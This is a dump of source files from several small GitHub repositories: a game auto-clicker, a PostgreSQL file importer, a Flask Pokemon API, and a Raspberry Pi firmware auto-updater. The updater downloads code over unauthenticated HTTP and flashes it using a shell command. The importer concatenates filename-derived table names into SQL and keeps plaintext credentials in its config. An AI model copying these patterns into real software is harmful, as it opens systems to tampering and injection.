[ { "alpha_fraction": 0.5648854970932007, "alphanum_fraction": 0.6444929242134094, "avg_line_length": 21.34883689880371, "blob_id": "198cb1dbb58ec796649cb8cb3bfed48982be2c9a", "content_id": "03dcd658a0494e6a1d191b7a68f554a9214066fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 917, "license_type": "no_license", "max_line_length": 52, "num_lines": 43, "path": "/main.py", "repo_name": "Mot0511/Standoff2Bot", "src_encoding": "UTF-8", "text": "import pyautogui\nimport time\n\nscreenWidth, screenHeight = pyautogui.size()\ncurrentMouseX, currentMouseY = pyautogui.position()\n\n\ncoins = 10\ncount = coins // 5\n\nfor i in range(0, count):\n    pyautogui.moveTo(799, 198)\n    pyautogui.click()\n    time.sleep(25)\n    pyautogui.moveTo(98, 393)\n    pyautogui.click()\n    time.sleep(3)\n    pyautogui.moveTo(1570, 72)\n    pyautogui.click()\n    time.sleep(3)\n    pyautogui.moveTo(653, 656)\n    pyautogui.click()\n    time.sleep(35)\n    # ----------------------\n    pyautogui.moveTo(1822, 49)\n    pyautogui.click()\n    time.sleep(3)\n    pyautogui.moveTo(1900, 984)\n    pyautogui.click()\n    time.sleep(3)\n    pyautogui.moveTo(1907, 1021)\n    pyautogui.click()\n    time.sleep(3)\n    pyautogui.moveTo(1308, 261)\n    pyautogui.click()\n    time.sleep(3)\n    pyautogui.moveTo(1900, 984)\n    pyautogui.click()\n    time.sleep(3)\n\npyautogui.alert('The end')\n" } ]
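The loop above repeats the same moveTo/click/sleep triple with hard-coded coordinates. A possible refactor, using a few of the script's own coordinates (which only make sense at the original author's screen resolution), could collapse the repetition into one helper:

```python
# Sketch: fold the repeated moveTo/click/sleep pattern into a single helper.
# The (x, y, wait) tuples are taken from main.py and are resolution-specific.
import time
import pyautogui

def click_at(x, y, wait):
    """Move to (x, y), click, then pause for `wait` seconds."""
    pyautogui.moveTo(x, y)
    pyautogui.click()
    time.sleep(wait)

for x, y, wait in [(799, 198, 25), (98, 393, 3), (1570, 72, 3), (653, 656, 35)]:
    click_at(x, y, wait)
```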
1
willcheung/db-importer
https://github.com/willcheung/db-importer
ebd7c674c3c5887b2845bfe4176f7f17c7696c1c
3340dc431613491cfc7b3f62818d6b8a202c1f3c
2a0c699c4e9ef61d65b41e68de94dcae9a88f8c8
refs/heads/master
2021-01-23T11:04:36.170112
2013-09-04T05:34:31
2013-09-04T05:34:31
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6455981731414795, "alphanum_fraction": 0.6636568903923035, "avg_line_length": 30.714284896850586, "blob_id": "afc78ec120e1889cd3b89e63f8bf603f53bfd7d0", "content_id": "a5ad3c34cdb3a06514e2accd89eed535f9d2c92d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 443, "license_type": "permissive", "max_line_length": 122, "num_lines": 14, "path": "/import_conf.py", "repo_name": "willcheung/db-importer", "src_encoding": "UTF-8", "text": "conn_info = {\n\t\t\t\t'host' : 'localhost',\n\t\t\t\t'dbname' : 'db-importer-test',\n\t\t\t\t'user' : 'wcheung',\n\t\t\t\t'password' : 'wcheung'\n}\n\ndelimiter = '\\t'\n\n# If the file has a date field (column name containing '-date'), it will be converted into a Postgres-friendly date (ex: 2012-12-01)\nfile_date_format = \"%Y-%m-%d\"\n\n# Sometimes there is an extra delimiter at the end of each line. This optionally removes the last character of each line. \nremove_last_char = False" }, { "alpha_fraction": 0.6567164063453674, "alphanum_fraction": 0.6630352139472961, "avg_line_length": 35.137794494628906, "blob_id": "35f5aac72b08a48a4cc66bb6d109760020bbde55", "content_id": "5ec7a4b7d8c2ea0761bdecf7cd461c274384ddee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9179, "license_type": "no_license", "max_line_length": 207, "num_lines": 254, "path": "/import.py", "repo_name": "willcheung/db-importer", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nimport re\nimport sys\nimport psycopg2\nimport argparse\nimport logging\nimport datetime\nimport time\nimport xlrd\nimport csv\nfrom import_conf import * # config file\n\ndef process_txt_files(f, column_names):\n\tline_num = 1 # which line number it's reading from source file. starts at 1 including header.\n\trow_count = 0 # how many rows are inserted\n\tskip_count = 1 # how many rows are skipped. starts at 1 including header.\n\t\n\tfor line in f:\n\t\tvals = []\n\t\tline_num = line_num + 1\n\t\t\t\n\t\t# line.strip()[:-1] is there to remove an extra '$' (delimiter) at the end of line. 
\n\t\t# This is only used if you have one extra delimiter at the end of each line.\n\t\tif remove_last_char:\n\t\t\tl = line.strip()[:-1]\n\t\telse:\n\t\t\tl = line.strip()\n\t\t\t\t \n\t\tif file_type == \"txt\":\n\t\t\tcol = l.split(delimiter)\n\t\telif file_type == \"csv\":\n\t\t\tcol = csv.reader([l], skipinitialspace=True)\n\t\t\tcol = col.next()\n\t\t\t\n\t\tfor col_idx, col in enumerate(col): \n\t\t\tif \"-date\" in str(column_names[col_idx]).lower() and col != '':\n\t\t\t\ttry:\n\t\t\t\t\t# convert date format to Postgres friendly date\n\t\t\t\t\tt = datetime.datetime.strptime(col, file_date_format) \n\t\t\t\t\tvals.append(t.strftime(\"%Y-%m-%d\"))\n\t\t\t\texcept ValueError as e:\n\t\t\t\t\tskip_count = skip_count + 1\n\t\t\t\t\tlogging.error(\"ERROR converting date on line {0} of {1}\\nData: {2}\\n{3}\".format(line_num, filename, line, e))\n\t\t\t\t\tvals = [] # don't insert this line\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tvals.append(col)\n\t\t\t\n\t\t# sometimes a line is formatted incorrectly\n\t\t# skip row and rollback transaction\n\t\tif vals:\n\t\t\ttry:\n\t\t\t\tinsert_string = \"insert into \" + domain + \" (\"+\",\".join(column_names) + \")\" + \" values (\" + \",\".join(['%s'] * len(vals)) + \")\"\n\t\t\t\tcursor.execute(insert_string, vals)\n\t\t\t\tconn.commit()\n\t\t\t\trow_count=row_count+1\n\t\t\texcept psycopg2.Error as e:\n\t\t\t\tconn.rollback()\n\t\t\t\tskip_count = skip_count + 1\n\t\t\t\tlogging.error(\"ERROR inserting to DB on line {1} of {2}.\\nData: {3}\\n{0}\".format(e.pgerror, line_num, filename, line))\n\t\n\treturn line_num,row_count\n\ndef process_xls_files(sheet):\n\tline_num = 1 # which line number it's reading from source file. starts at 1 including header.\n\trow_count = 0 # how many rows are inserted\n\tskip_count = 1 # how many rows are skipped. 
starts at 1 including header.\n\t\n\tfor row_idx in xrange(1, sheet.nrows):\n\t\tvals = []\n\t\tline_num = line_num + 1\n\t\t\n\t\tfor col_idx, col in enumerate(sheet.row(row_idx)):\n\t\t\tif col_idx not in column_skip:\n\t\t\t\tif isinstance(col.value, str) or isinstance(col.value, unicode):\n\t\t\t\t\tif isinstance(col.value, str) and len(col.value.strip()) == 0:\n\t\t\t\t\t\tvals.append(None)\n\t\t\t\t\telif isinstance(col.value, unicode) and len((col.value).strip()) == 0:\n\t\t\t\t\t\tvals.append(None)\n\t\t\t\t\telse:\n\t\t\t\t\t\tvals.append(col.value[:1023])\n\t\t\t\telif \"date\" in str(column_names[col_idx]).lower() or \"dtc\" in str(column_names[col_idx]).lower(): # converts excel-stored float into dates\n\t\t\t\t\tif (col.value is not None) and int(col.value) > 60:\n\t\t\t\t\t\tvals.append(str(datetime.datetime(*xlrd.xldate_as_tuple(col.value, sheet.book.datemode))))\n\t\t\t\t\telse:\n\t\t\t\t\t\tvals.append(None)\n\t\t\t\telse:\n\t\t\t\t\tvals.append(col.value)\n\t\t\t\t\t\n\t\t# values = ['%s'] * len(vals)\n\t\t# values = [value.replace('\\'TIMESTAMP', 'TIMESTAMP\\'') for value in values]\n\n\t\tinsert_string = \"insert into \" + domain + \" (\"+\",\".join(column_names) + \")\" + \" values (\" + \",\".join(['%s'] * len(vals)) + \")\"\n\t\t#print insert_string\n\t\trow_count=row_count+1\n\t\tcursor.execute(insert_string, vals)\n\t\tconn.commit()\n\t\n\treturn line_num,row_count\n\ndef create_tables(domain, column_names):\n\tdrop_string = \"drop table if exists \" + domain + \";\"\n\tlogging.info(\"Dropping table \"+domain)\n\tprint drop_string\n\tcreate_string = \"create table \" + domain + \" (id_ serial,\\n \" + \" varchar(1024),\\n\".join(column_names) + \" varchar(1024));\" \n\tlogging.info(\"Creating table \"+domain)\n\tprint create_string\n\tcursor.execute(drop_string)\n\tcursor.execute(create_string)\n\tconn.commit()\n\ndef delete_data(domain):\n\tdelete_string = \"delete from \" + domain + \";\"\n\tlogging.info(\"Deleting data from \" + domain)\n\tprint \"Deleting data from \" + domain\n\tcursor.execute(delete_string)\n\tconn.commit()\n\n########## Main Starts Here ############\nparser = argparse.ArgumentParser(description='Parse delimited text files and load them into PostgreSQL. The script can optionally create tables based on the files. If table exists, it will append the data.')\nparser.add_argument(\"path\", help=\"path of excel or text files. Example: ~/directory_of_files/\")\nparser.add_argument(\"--file\", help=\"only process a SINGLE file from [path] argument and ignore other files. Example: --file filename.xls will process only ~directory_of_files/filename.xls\")\nparser.add_argument(\"--create_tables\", help=\"Drops table if it exists. Creates db table.\", action=\"store_true\")\nparser.add_argument(\"--delete_data\", help=\"Deletes data from table without dropping table.\", action=\"store_true\")\nargs = parser.parse_args()\n\npath = args.path\nfiles = None\nfile_type = None\n\nif args.file:\n\tfile = args.file\n\tfiles = filter(lambda x: file == x, os.listdir(path))\n\tif not files:\n\t\tprint \"Can't find %s. Bye bye.\" % file\n\t\tsys.exit()\n\t\t\n\tif \".txt\" in file.lower():\n\t\tfile_type = \"txt\"\n\telif \".csv\" in file.lower():\n\t\tfile_type = \"csv\"\n\telif \".xlsx\" in file or \".xls\" in file:\n\t\tfile_type = \"xls\"\n\telse: \n\t\tprint \"File is not .txt or .xls / .xlsx. 
Please specify a .txt, .csv, .xls, or .xlsx file.\"\n\t\tsys.exit()\nelse: # process all files in [path]\n\tfiles = filter(lambda x: \".txt\" in x.lower(), os.listdir(path))\n\tfile_type = \"txt\"\n\tif not files:\n\t\tfiles = filter(lambda x: \".csv\" in x.lower(), os.listdir(path))\n\t\tfile_type = \"csv\"\n\t\tif not files:\n\t\t\tfiles = filter(lambda x: \".xlsx\" in x.lower() or \".xls\" in x.lower(), os.listdir(path))\n\t\t\tfile_type = \"xls\"\n\t\t\tif not files:\n\t\t\t\tprint \"No files are found.\"\n\t\t\t\tsys.exit()\n\nprint files\n\nlog_filename = datetime.datetime.now().strftime('log_%m-%d-%Y.log')\nlogging.basicConfig(filename=log_filename, level=logging.INFO, format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')\n\nconn_string = \"host='{0}' dbname='{1}' user='{2}' password='{3}'\".format(conn_info['host'], conn_info['dbname'], conn_info['user'], conn_info['password']) \nlogging.info(\"Connecting to server...\")\nconn = psycopg2.connect(conn_string)\ncursor = conn.cursor()\nlogging.info(\"Connected to server\")\n\nlogging.info(\"Reading %s files: %s\" % (str(len(files)),str(files)))\nprocessed_domain = [] # initialize domain <-> filename mapping\n\nfor filename in files:\n\tcolumn_skip = set() # some columns are 0 len \n\tcolumn_names = [] # cleaned up column names\n\txls_column_names = [] # original column names (from excel)\n\tlines_read = 0\n\trows_inserted = 0\n\n\tdomain = os.path.splitext(filename)[0].replace(' ','').lower() # create table based on filename\n\t\n\tif domain is None:\n\t\tprint \"File does not match domain: %s\" % filename\n\t\tlogging.info(\"File does not match domain: %s\" % filename)\n\t\tcontinue\n\t\n\t\n\t# Get columns\n\tif file_type == \"txt\" or file_type == \"csv\":\n\t\twith open(path + '/' + filename, 'rU') as f:\n\t\t\t# get the columns by reading first line\n\t\t\tif file_type == \"csv\":\n\t\t\t\tcolumn_names = f.readline().strip().split(',')\n\t\t\telse:\n\t\t\t\tcolumn_names = f.readline().strip().split(delimiter)\n\n\t\t\t# get rid of unicodes, dashes and spaces in column names\n\t\t\tcolumn_names = [re.sub(r'[\\W]+','',c.replace('\\xef\\xbb\\xbf', '').replace('-','_').replace(' ','_')) for c in column_names]\n\t\t\n\t\t\tprint \"\\nGetting columns from \" + filename\n\t\t\tprint column_names\n\t\t\t\n\t\t\t# Create table from columns\n\t\t\tif domain not in processed_domain: # first time seeing this domain - create table and adapter node\n\t\t\t\tprocessed_domain.append(domain) # push domain into processed list\n\t\t\n\t\t\t\tif args.create_tables:\n\t\t\t\t\tcreate_tables(domain, column_names)\n\t\t\t\n\t\t\t\tif args.delete_data:\n\t\t\t\t\tdelete_data(domain)\n\t\t\t\n\t\t\t# now insert the data\n\t\t\tlogging.info(\"Inserting data into \"+domain+\" from \"+str(filename))\n\t\t\tlines_read,rows_inserted = process_txt_files(f, column_names)\n\n\telif file_type == \"xls\":\n\t\tsheet = xlrd.open_workbook(path + '/' + filename).sheets()[0]\n\t\t\n\t\t# get the columns\n\t\tfor column_index, column in enumerate([col.value for col in sheet.row(0)]):\n\t\t\t# some of these end up being 0 len\n\t\t\tif(len(column) == 0):\n\t\t\t\tcolumn_skip.add(column_index)\n\t\t\t\tcontinue\n\t\t\t# elif \"comment\" in str(column).lower(): # ignore comments\n\t\t\t# \tcolumn_skip.add(column_index)\n\t\t\t# \tcontinue\n\t\t\txls_column_names.append(str(column))\n\t\t\tcolumn_names = [re.sub(r'[\\W]+','',c.replace('-','_').replace(' ','_')) for c in xls_column_names]\n\n\t\tprint \"\\nGetting columns from \" + filename\n\t\tprint column_names\n\t\t\n\t\t# Create table from 
columns\n\t\tif domain not in processed_domain: # first time seeing this domain - create table and adapter node\n\t\t\tprocessed_domain.append(domain) # push domain into processed list\n\t\t\n\t\t\tif args.create_tables:\n\t\t\t\tcreate_tables(domain, column_names)\n\t\t\t\n\t\t\tif args.delete_data:\n\t\t\t\tdelete_data(domain)\n\t\t\n\t\t# now insert the data\n\t\tlogging.info(\"Inserting data into \"+domain+\" from \"+str(filename))\n\t\tlines_read,rows_inserted = process_xls_files(sheet)\n\t\n\tlogging.info(\"----- READ %s rows (incl. header) from %s | INSERTED %s rows into %s -----\" % (lines_read, filename, rows_inserted, domain))\n\n\nlogging.info(\"Finished processing %s files. All done!\" % str(len(files)))\n" }, { "alpha_fraction": 0.7263763546943665, "alphanum_fraction": 0.733771562576294, "avg_line_length": 33.28168869018555, "blob_id": "0bd279ac93749fafc26c142f3ccfae55b8d10892", "content_id": "4f2541837180baeba068ddae83de5277e29f6446", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2434, "license_type": "no_license", "max_line_length": 165, "num_lines": 71, "path": "/README.md", "repo_name": "willcheung/db-importer", "src_encoding": "UTF-8", "text": "db-importer\n===========\nPython script that imports any Excel, CSV, or text file with any delimiter into a PostgreSQL database.\n\n### Setting up libraries\n* Make sure you have postgresql installed.\n* Xcode installed\n\n#### Install psycopg2 (for talking to postgres)\n* Download src from http://initd.org/psycopg/download/\n* Follow instructions. If you get 'unable to execute clang...' error, follow http://jaranto.blogspot.com/2012/08/os-x-unable-to-execute-clang-no-such.html\n\n#### Install xlrd (for talking to excel)\n* Download src from https://pypi.python.org/pypi/xlrd/0.9.2\n* Any OS: Unzip the .zip file into a suitable directory, chdir to that directory, then do \"sudo python setup.py install\".\n\n\n**Features:**\n\n* Configuration file to set db connection info\n* Reads any XLS, CSV, or TXT file with any delimiter\n* Reads and parses multiple files into same or different tables\n* Error logging and exception handling that returns skipped rows\n* Option to create tables from filenames\n* Option to append or delete data\n* Option to convert date data from any format to SQL friendly format\n\n### Usage:\n*Note:* Place all the xls, csv, or txt files in a single directory. db-importer will read all the files in that directory by default, unless you specify a single filename.\n\nInsert or append data from multiple files to existing tables:\n```\npython import.py [path/to/your/files]\n```\n\nInsert or append data from a SINGLE file to an existing table:\n```\npython import.py [path/to/your/files] --file [filename.xls]\n```\n\nCreate tables (note: this will drop tables if they exist):\n```\npython import.py --create_tables [path/to/your/files]\n```\n\nRefresh data (delete data from tables and reload):\n```\npython import.py --delete_data [path/to/your/files]\n```\n\t\n**Configuration:**\n```python\nconn_info = {\n\t\t\t\t'host' : 'localhost',\n\t\t\t\t'dbname' : 'mydb',\n\t\t\t\t'user' : 'postgres',\n\t\t\t\t'password' : 'postgres'\n}\n\ndelimiter = '$'\n\n# If the file has a date field (column name containing '-date'), it will be converted into a Postgres-friendly date (ex: 2012-12-01)\nfile_date_format = \"%Y%m%d\"\n\n# Sometimes there is an extra delimiter at the end of each line. This optionally removes the last character of each line. 
\nremove_last_char = True\n```\n\n**Future Improvements**\n* Create table columns based on XLS cell types. Currently the script creates a table with all varchar columns.\n* Insert into existing table that is not varchar. Currently the script only inserts strings into columns.\n" } ]
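One possible starting point for the first improvement listed above (inferring column types instead of defaulting to varchar): xlrd exposes a ctype code on every cell, which can be mapped to Postgres types. This is only a sketch, not part of import.py; the XL_CELL_* constants are real xlrd names, but the type mapping is a guess at sensible defaults, and a robust version would sample more than one row and handle empty cells.

```python
# Sketch: map xlrd cell-type codes from the first data row to Postgres column
# types, falling back to varchar for anything unrecognized.
import xlrd

CTYPE_TO_SQL = {
    xlrd.XL_CELL_NUMBER: 'double precision',
    xlrd.XL_CELL_DATE: 'timestamp',
    xlrd.XL_CELL_BOOLEAN: 'boolean',
    xlrd.XL_CELL_TEXT: 'varchar(1024)',
}

def infer_column_types(sheet):
    """Return one SQL type per column, based on the first data row's cells."""
    return [CTYPE_TO_SQL.get(cell.ctype, 'varchar(1024)') for cell in sheet.row(1)]
```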
3
MarsBarLee/PokemonAPIFlask
https://github.com/MarsBarLee/PokemonAPIFlask
78efa423c188c2a3623ed681468bdd48227f6325
5e23bfbd8729d6cfe290449adaab784e9d8f531f
9152c4a527b423589047cd6f671b6ad8738ec319
refs/heads/master
2022-11-13T03:54:54.979629
2019-12-18T18:34:56
2019-12-18T18:34:56
228,229,692
0
1
null
2019-12-15T18:17:20
2019-12-18T18:35:23
2019-12-18T18:35:19
Python
[ { "alpha_fraction": 0.7058823704719543, "alphanum_fraction": 0.7117000818252563, "avg_line_length": 36.60975646972656, "blob_id": "5493c2fc827f189ef9515412b3e43f7b0d16e6ec", "content_id": "b280afa2193f7ee4a2a60e384666022572862bed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1549, "license_type": "no_license", "max_line_length": 325, "num_lines": 41, "path": "/views/pokemons.py", "repo_name": "MarsBarLee/PokemonAPIFlask", "src_encoding": "UTF-8", "text": "# pokemons.py is the View of the MVC pattern.\n# this file is equivalent to routes in Node\n\nfrom flask import Blueprint, abort, current_app, g\n # Blueprints are like React components: A blueprint defines a collection of views, templates, static files and other elements that can be applied to an application. For example, let’s imagine that we have a blueprint for an admin panel. This blueprint would define the views for routes like /admin/login and /admin/dashboard\nimport json\nfrom repos import PokemonRepo\n # from repos/pokemon_repo.py, import the class PokemonRepo\nfrom data_access import PokemonDataAccess\nfrom flasgger import Swagger\n\npokemons = Blueprint('pokemons', __name__)\n\[email protected]('/pokemon/stats/<code>', methods = ['GET']) # code is pokemon's name\ndef by_stats(code):\n    repo = PokemonRepo(PokemonDataAccess())\n    response = repo.get_stats(code)\n\n    if response is None:\n        abort(404)\n    return response\n    # View of MVC pattern. Already JSONified in pokemon_repo.py, which is the Controller of the MVC pattern\n\[email protected]('/pokemon/capture_rate/<code>', methods = ['GET'])\ndef capture_rate(code):\n    repo = PokemonRepo(PokemonDataAccess())\n    response = repo.get_capture_rate(code)\n\n    if response is None:\n        abort(404)\n    return response\n\n \[email protected]('/pokemon/general_info/<code>', methods = ['GET'])\ndef gen_info(code):\n    repo = PokemonRepo(PokemonDataAccess())\n    response = repo.get_gen_info(code)\n\n    if response is None:\n        abort(404)\n    return response\n\n\n\n\n\n" }, { "alpha_fraction": 0.6373937726020813, "alphanum_fraction": 0.6373937726020813, "avg_line_length": 36.78571319580078, "blob_id": "ff8646fef31618365c837ac8e80b135fc630dda7", "content_id": "9971da7b11c5285e7663e69c70b09c683c51354d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1087, "license_type": "no_license", "max_line_length": 184, "num_lines": 28, "path": "/repos/pokemon_repo.py", "repo_name": "MarsBarLee/PokemonAPIFlask", "src_encoding": "UTF-8", "text": "# pokemon_repo.py is the Controller of the MVC pattern.\nimport json\nimport pandas as pd\n\nclass PokemonRepo(object):\n\n    def __init__(self, da):\n        self.__datastore = da\n\n    def get_stats(self, code):\n        result = self.__datastore.get_stats(code) # refer to pokemon_dao.py, which is the Model of the MVC pattern, for how the get_stats function works\n        if result is None:\n            return None\n        return result.to_json(orient='records')\n        # Encoding/decoding a Dataframe using 'records' formatted JSON. 
The DataFrame default is ‘columns’; allowed values are: {‘split’,’records’,’index’,’columns’,’values’,’table’}\n        # Controller of MVC pattern\n\n    def get_gen_info(self, code):\n        result = self.__datastore.get_gen_info(code)\n        if result is None:\n            return None\n        return result.to_json(orient='records')\n\n    def get_capture_rate(self, code):\n        result = self.__datastore.get_capture_rate(code)\n        if result is None:\n            return None\n        return result.to_json(orient='records')\n\n" }, { "alpha_fraction": 0.6502057909965515, "alphanum_fraction": 0.6502057909965515, "avg_line_length": 48.82352828979492, "blob_id": "ae1df5cbde0fae92795be869340f70d847c148a0", "content_id": "e0a359e82b0ffcdb70ec71712a5590bcb5b3aaba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1701, "license_type": "no_license", "max_line_length": 149, "num_lines": 34, "path": "/data_access/pokemon_dao.py", "repo_name": "MarsBarLee/PokemonAPIFlask", "src_encoding": "UTF-8", "text": "# pokemon_dao.py is the Model of the MVC pattern. The Model takes information from the database, our pokemon.csv, which it reads via pandas. \nimport pandas as pd\n\nclass PokemonDataAccess(object):\n\n    def __init__(self):\n        self.df = pd.read_csv('pokemon.csv') # use pandas to read csv\n\n\n    def get_stats(self, code):\n        # this should return a pre-set dataframe(rows, columns) in the format expected by the repository\n        # df['column_name']\n        df = self.df[['name','attack', 'defense', 'speed']] # selecting specific columns. the kaggle csv has multiple columns to choose from\n        pokemon_stats = df.loc[df['name'] == code]\n        # Access the dataframe, return rows whose 'name' column equals the name you're looking for in the url. In pokemons.py, @pokemons.route('/pokemon/stats/<code>\n        # pandas.DataFrame.loc. Access a group of rows and columns by labels\n        \n        return pokemon_stats # return the column values. 
Will be jsonified in pokemon_repo.py, which is the Controller of the MVC pattern\n    \n    def get_capture_rate(self, code):\n        # this should return a pre-set dataframe in the format expected by the repo\n        df = self.df[['name','capture_rate']]\n        pokemon_capture_rate = df.loc[df['name'] == code]\n        \n        return pokemon_capture_rate \n    \n\n\n    def get_gen_info(self, code):\n        # this should return a pre-set dataframe in the format expected by the repo\n        # note: 'classfication' is the actual (misspelled) column name in the Kaggle csv\n        df = self.df[['name','abilities', 'classfication', 'pokedex_number', 'generation']]\n        pokemon_gen_info = df.loc[df['name'] == code]\n        return pokemon_gen_info " }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 22, "blob_id": "0df38ecca103ba198f9b8c3d666fe5014ec05b00", "content_id": "db4e3df9dc2994f955afe7e39b0a40cf730cc6d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 68, "license_type": "no_license", "max_line_length": 42, "num_lines": 3, "path": "/repos/__init__.py", "repo_name": "MarsBarLee/PokemonAPIFlask", "src_encoding": "UTF-8", "text": "__all__=['pokemon_repo']\n\nfrom repos.pokemon_repo import PokemonRepo" }, { "alpha_fraction": 0.7241379022598267, "alphanum_fraction": 0.7241379022598267, "avg_line_length": 18.33333396911621, "blob_id": "a98c496cbd852e076f124e52a27b44afca9581e9", "content_id": "2deee061859824bf2d39f67a63a0f08f9c4e9250", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 58, "license_type": "no_license", "max_line_length": 35, "num_lines": 3, "path": "/views/__init__.py", "repo_name": "MarsBarLee/PokemonAPIFlask", "src_encoding": "UTF-8", "text": "__all__=['pokemons']\n\nfrom views.pokemons import pokemons\n" }, { "alpha_fraction": 0.7183708548545837, "alphanum_fraction": 0.7253032922744751, "avg_line_length": 29.36842155456543, "blob_id": "6002f33d85f7acb1b0b6c38db06d7bd0f5d216f2", "content_id": "99d2f9e73ecd0f35b5216ded1890caceb297fc5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1154, "license_type": "no_license", "max_line_length": 352, "num_lines": 38, "path": "/app.py", "repo_name": "MarsBarLee/PokemonAPIFlask", "src_encoding": "UTF-8", "text": "from flask import Flask, request\nfrom views import pokemons\nfrom data_access import PokemonDataAccess\n# from here: https://www.kaggle.com/rounakbanik/pokemon\nfrom flasgger import APISpec, Schema, Swagger, fields\n# Flasgger(Flask+Swagger) is a Flask extension to extract OpenAPI-Specification from all Flask views registered in your API.\n# Swagger is a simple yet powerful representation of your RESTful API. With the largest ecosystem of API tooling on the planet, thousands of developers are supporting Swagger in almost every modern programming language and deployment environment. 
With a Swagger-enabled API, you get interactive documentation, client SDK generation and discoverability.\n\napp = Flask(__name__)\n\n# spec = APISpec(\n# title='Entity API',\n# version='1.0.10',\n# openapi_version='2.0'\n# )\n# template = spec.to_flasgger(app)\n# swagger = Swagger(app, template=template)\nswagger = Swagger(app)\n\napp.register_blueprint(pokemons)\n\n\n\n\n\n\[email protected](\"/\", methods = ['GET'])\ndef hello():\n return \"\"\"\n<html>\n <body>\n <h1>Welcome to the Pokemon API!</h2>\n </body>\n</html>\n\"\"\"\n\nif __name__ == '__main__':\n app.run(debug=True)\n" }, { "alpha_fraction": 0.7692307829856873, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 25.33333396911621, "blob_id": "976fc4866ccc335bf615ae0c299fa9c6a3ee5b0d", "content_id": "1f126aafe734d91337f25880a4c6455d7c07d25f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 78, "license_type": "no_license", "max_line_length": 53, "num_lines": 3, "path": "/data_access/__init__.py", "repo_name": "MarsBarLee/PokemonAPIFlask", "src_encoding": "UTF-8", "text": "__all__=['pokemon_dao']\n\nfrom data_access.pokemon_dao import PokemonDataAccess" } ]
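A quick way to exercise the three routes defined in views/pokemons.py once `python app.py` is running. This sketch assumes the Flask development server's default address (127.0.0.1:5000) and that the name's casing matches pokemon.csv exactly; 'Pikachu' is only a guess at that casing:

```python
# Smoke test for the three blueprint routes; a 404 means the name was not
# found in pokemon.csv (names are matched exactly, casing included).
import requests

base = 'http://127.0.0.1:5000'
for route in ('stats', 'capture_rate', 'general_info'):
    r = requests.get('%s/pokemon/%s/Pikachu' % (base, route))
    print(route, r.status_code, r.text)
```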
7
taida957789/IsraelResearchCooperation
https://github.com/taida957789/IsraelResearchCooperation
9ec4f994515f663e13093f64681afb32011c01cb
42d6648ba8b9fb8fad3cc715afe21ef72c1df243
14d5026a7243c199c1dd9f93b00ac1b257b7bc12
refs/heads/master
2020-09-25T18:45:18.206303
2016-09-11T09:43:09
2016-09-11T09:43:09
67,294,238
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6155340075492859, "alphanum_fraction": 0.6355987191200256, "avg_line_length": 26.446428298950195, "blob_id": "b3b45fdab642f15590c4f4d61858274d858f57b3", "content_id": "41c210f35fc801858c92d14f500d4623292f542a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1545, "license_type": "no_license", "max_line_length": 100, "num_lines": 56, "path": "/AutoUpdate/updater.py", "repo_name": "taida957789/IsraelResearchCooperation", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#-*- coding=utf-8\n\nimport os, os.path, json, hashlib\nimport requests\nimport subprocess\n\n\nURL_UPDATE_VERSION = 'http://192.168.2.5:8080/version.json'\nFILE_UPDATER = 'updater.py'\nFILE_HEX = 'binary.hex'\n\n\ndef md5(filename):\n    return hashlib.md5(open(filename, 'rb').read()).hexdigest()\n\ndef check_md5(filename, hash_file):\n    if not os.path.isfile(filename):\n        return False\n    return md5(filename) == hash_file\n\ndef download(url, filename):\n    r = requests.get(url, stream=True)\n    chunk_size = 1024\n    with open(filename, 'wb') as fd:\n        for chunk in r.iter_content(chunk_size):\n            fd.write(chunk)\n\ndef get_remote_version():\n    return json.loads(requests.get(URL_UPDATE_VERSION).text)\n\n\ndef update(filename, hash_file, url):\n    if check_md5(filename, hash_file):\n        print '[INFO] %s version is the newest' % (hash_file)\n    else:\n        download(url, filename)\n        if check_md5(filename, hash_file):\n            print '[INFO] Updating %s successfully' % (filename)\n        else:\n            raise Exception('Updating %s failed' % (filename))\n\nfields = get_remote_version()\n\ntry:\n    update(FILE_UPDATER, fields['md5_updater'], fields['link_updater'])\n    update(FILE_HEX, fields['md5_binary'], fields['link_binary'])\n    cmd = 'avrdude -c linuxgpio -C /etc/avrdude.conf -p m32u4 -U flash:w:binary.hex -Uflash:w:$1 $2'\n    # subprocess.call returns the process exit status; avrdude exits 0 on success\n    ret_code = subprocess.call(cmd, shell=True)\n    if ret_code == 0:\n        print 'Success'\n    else:\n        print 'Failed'\nexcept:\n    raise\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.9259259104728699, "alphanum_fraction": 0.9259259104728699, "avg_line_length": 26, "blob_id": "2945cdf7aab4dbe796b81977269dd6a2bce0c0f4", "content_id": "e3cd755a2f5e53a1804d048c7fe59e8c326fe583", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 54, "license_type": "no_license", "max_line_length": 27, "num_lines": 2, "path": "/README.md", "repo_name": "taida957789/IsraelResearchCooperation", "src_encoding": "UTF-8", "text": "# IsraelResearchCooperation\nIsraelResearchCooperation\n" } ]
